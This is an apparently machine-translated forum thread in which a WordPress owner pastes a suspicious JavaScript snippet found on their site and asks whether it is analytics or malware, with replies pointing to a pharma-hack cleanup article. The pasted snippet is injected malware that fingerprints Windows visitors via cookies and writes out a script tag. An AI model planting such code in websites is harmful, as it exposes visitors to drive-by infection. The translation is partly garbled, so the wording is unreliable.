我有一个WordPress的安装,目标已经非常严重的网络钓鱼操作。我原本以为安全主要覆盖除了我看到这个标题:这是什么?谷歌分析cookie或恶意软件?
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
该URL的到底是超级可疑。我一派但没有发现线索:-(
我还没有发现在我的WP安装代码的来源。它不被写入模板文件或数据库。在更新WP现在安装的过程。
有没有人有任何这知识呢?
那么,如果该网站被感染,它不是一个好主意,浏览它 – MikeAinOz 2010-08-27 22:30:31
糟糕。是的,对不起.... :-( 答复发现:http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html 哎唷! – Niels 2010-08-27 22:33:51